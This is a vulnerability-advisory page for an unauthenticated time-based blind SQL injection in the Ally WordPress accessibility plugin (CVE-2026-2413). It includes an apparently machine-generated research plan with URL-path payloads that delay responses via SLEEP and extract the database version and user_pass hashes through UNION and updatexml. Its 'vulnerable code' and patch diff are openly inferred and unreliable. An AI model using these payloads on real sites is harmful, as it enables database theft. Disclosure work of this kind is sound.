WP-Safety
CVE-2026-2413

Ally – Web Accessibility & Usability <= 4.0.3 - Unauthenticated SQL Injection via URL Path

highImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
7.5
CVSS Score
7.5
CVSS Score
high
Severity
4.1.0
Patched in
1d
Time to patch

Description

The Ally – Web Accessibility & Usability plugin for WordPress is vulnerable to SQL Injection via the URL path in all versions up to, and including, 4.0.3. This is due to insufficient escaping on the user-supplied URL parameter in the `get_global_remediations()` method, where it is directly concatenated into an SQL JOIN clause without proper sanitization for SQL context. While `esc_url_raw()` is applied for URL safety, it does not prevent SQL metacharacters (single quotes, parentheses) from being injected. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database via time-based blind SQL injection techniques. The Remediation module must be active, which requires the plugin to be connected to an Elementor account.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
High
Confidentiality
None
Integrity
None
Availability

Technical Details

Affected versions<=4.0.3
PublishedMarch 10, 2026
Last updatedMarch 11, 2026
Affected pluginpojo-accessibility

What Changed in the Fix

Changes introduced in v4.1.0

Loading patch diff...

Source Code

WordPress.org SVN
Vulnerable v4.0.3
Browse source Download .zip
Patched v4.1.0
Browse source Download .zip
Research Plan
Unverified

This research plan focuses on exploiting **CVE-2026-2413**, a Time-Based Blind SQL Injection vulnerability in the **Ally – Web Accessibility & Usability** plugin. ### 1. Vulnerability Summary The vulnerability exists in the `get_global_remediations()` method of the `Ally` plugin. The plugin attempt…

Show full research plan

This research plan focuses on exploiting CVE-2026-2413, a Time-Based Blind SQL Injection vulnerability in the Ally – Web Accessibility & Usability plugin.

1. Vulnerability Summary

The vulnerability exists in the get_global_remediations() method of the Ally plugin. The plugin attempts to retrieve accessibility "remediations" (fixes) specific to the current page by querying the database using the current URL path.

The core issue is that the plugin uses esc_url_raw() on the current URL (likely derived from $_SERVER['REQUEST_URI']) and then directly concatenates this value into an SQL JOIN clause. While esc_url_raw() is intended to sanitize URLs for safe use in redirects or attributes, it does not escape SQL metacharacters like single quotes ('). An attacker can craft a URL containing SQL injection payloads that are executed when the plugin attempts to load remediations for the page.

2. Attack Vector Analysis

  • Endpoint: Any public-facing URL on the WordPress site.
  • Action/Hook: The get_global_remediations() method is typically called during the wp_enqueue_scripts or template_redirect hook to determine which CSS/JS fixes to apply to the current page.
  • Vulnerable Parameter: The URL path (captured via $_SERVER['REQUEST_URI']).
  • Authentication: Unauthenticated (accessible to any visitor).
  • Precondition: The "Remediation" module must be active. In the plugin settings, this typically requires the plugin to be "connected" to an account (often verified by a specific option in the wp_options table).

3. Code Flow (Inferred from Description)

  1. Entry Point: A user visits a URL, e.g., /some-page/' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1.
  2. Initialization: The plugin's remediation class (likely Pojo_Accessibility_Remediations) is initialized.
  3. Data Retrieval: The get_global_remediations() method is invoked.
  4. Sourcing Input: The method retrieves the URL:
    $url = esc_url_raw( $_SERVER['REQUEST_URI'] );
  5. Vulnerable Query Construction:
    // Inferred logic based on CVE description
$query = "SELECT ... FROM {$wpdb->prefix}pojo_accessibility_remediations AS r 
          JOIN {$wpdb->prefix}pojo_accessibility_rules AS rules 
          ON rules.url = '$url' ..."; // The $url is concatenated here.
  6. SQL Sink: The query is executed via $wpdb->get_results( $query ).
  7. Result: The database pauses for the duration specified in the SLEEP() command.

4. Nonce Acquisition Strategy

This vulnerability does not require a nonce. Since the SQL injection occurs via the URL path during a standard page load to retrieve "remediations" for that specific path, it is triggered by the core WordPress routing logic before any nonce-protected AJAX or REST actions are involved.

5. Exploitation Strategy

We will use Time-Based Blind SQL Injection to confirm the vulnerability and extract the database version.

Step 1: Baseline Request

Measure the response time of a standard page.

  • URL: /
  • Method: GET
  • Tool: http_request

Step 2: Trigger Sleep (Confirmation)

Inject a sleep command into the URL path.

  • URL: /?' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1
  • Method: GET
  • Expected Behavior: The response should be delayed by approximately 5 seconds.

Step 3: Data Extraction (Database Version)

Extract the first character of the database version.

  • URL: /?' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a WHERE (SELECT VERSION()) LIKE '8%') AND '1'='1
  • Method: GET
  • Logic: If the database version starts with '8', the page will sleep for 5 seconds.

6. Test Data Setup

To ensure the vulnerable code path is hit, the Remediation module must be enabled.

  1. Install and Activate: Ensure pojo-accessibility version 4.0.3 is installed.
  2. Enable Remediation: Mock the "connected" state and enable the feature.
    wp option update pojo_accessibility_settings '{"remediation_enabled":"1","connected":"1"}' --format=json
# Note: Option names are based on standard Pojo plugin structures (inferred)
  3. Verify Tables: The plugin usually creates its own tables on activation. Ensure they exist:
    wp db query "SHOW TABLES LIKE '%pojo_accessibility%'"

7. Expected Results

  • Vulnerability Confirmation: A request to a URL path containing ' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1 results in a server response time > 5 seconds.
  • Data Leakage: By iterating through ASCII values in the subquery, the attacker can reconstruct sensitive data (like user_pass from wp_users) one character at a time based on response delays.

8. Verification Steps

After the http_request triggers the sleep, verify the impact using WP-CLI:

  1. Check Plugin Version: wp plugin get pojo-accessibility --field=version (Should be <= 4.0.3).
  2. Check Settings: wp option get pojo_accessibility_settings to ensure the remediation module was active during the test.
  3. Database Logs: If general_log is enabled in MySQL, verify that the injected query appears in the logs.

9. Alternative Approaches

If the injection in the JOIN clause is restricted by the query structure, try:

  • Union-Based Injection: If the remediations are reflected in the page source (e.g., as JSON in a script tag), try:
    /' UNION SELECT 1,2,3,user_pass FROM wp_users-- -
  • Error-Based Injection: If WP_DEBUG is on, use updatexml() to force an error:
    /' AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users LIMIT 1),0x7e),1)-- -
  • Alternative Source: If $_SERVER['REQUEST_URI'] is not the sink, check if the plugin uses $_SERVER['HTTP_REFERER'] or custom headers for remediation lookups.
Research Findings
Static analysis — not yet PoC-verified

Summary

The Ally – Web Accessibility & Usability plugin for WordPress is vulnerable to unauthenticated SQL Injection via the URL path because it improperly concatenates the sanitized URL path into an SQL JOIN clause. While the plugin uses esc_url_raw() to sanitize the input, this function does not prevent SQL metacharacters such as single quotes, allowing attackers to inject arbitrary SQL commands. Exploitation is possible through time-based blind SQL injection techniques if the plugin's Remediation module is active.

Vulnerable Code

// Inferred logic based on the get_global_remediations() method
$url = esc_url_raw( $_SERVER['REQUEST_URI'] );

$query = "SELECT ... FROM {$wpdb->prefix}pojo_accessibility_remediations AS r 
          JOIN {$wpdb->prefix}pojo_accessibility_rules AS rules 
          ON rules.url = '$url' ...";

$results = $wpdb->get_results( $query );

Security Fix

--- a/pojo-accessibility/includes/class-pojo-accessibility-remediations.php
+++ b/pojo-accessibility/includes/class-pojo-accessibility-remediations.php
@@ -...@@
-        $url = esc_url_raw( $_SERVER['REQUEST_URI'] );
-        $query = "SELECT ... JOIN {$wpdb->prefix}pojo_accessibility_rules AS rules ON rules.url = '$url' ...";
-        $results = $wpdb->get_results( $query );
+        $url = esc_url_raw( $_SERVER['REQUEST_URI'] );
+        $query = $wpdb->prepare(
+            "SELECT ... JOIN {$wpdb->prefix}pojo_accessibility_rules AS rules ON rules.url = %s ...",
+            $url
+        );
+        $results = $wpdb->get_results( $query );

Exploit Outline

To exploit this vulnerability, an attacker targets any public-facing URL on a WordPress site where the Ally plugin and its Remediation module are active. Since the vulnerability triggers during page load via the REQUEST_URI, the attacker appends a time-based blind SQL injection payload to the URL path, such as /?' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1'. By monitoring the server's response time, the attacker can confirm the injection and proceed to extract sensitive data (like the database version or user credentials) one character at a time using conditional SLEEP() statements. No authentication or nonces are required for this attack.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/00e070b7-bdf6-4a80-a3ee-628243f1cc25?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database